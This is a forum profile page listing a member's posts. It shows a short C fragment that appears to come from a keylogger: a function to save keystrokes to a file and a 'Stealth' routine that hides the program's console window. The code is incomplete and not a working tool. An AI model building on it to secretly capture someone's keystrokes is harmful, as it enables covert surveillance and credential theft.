This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
int Save (int key_stroke, char *file);
void Stealth();
void Stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass", NULL); ShowWindow(stealth,0);}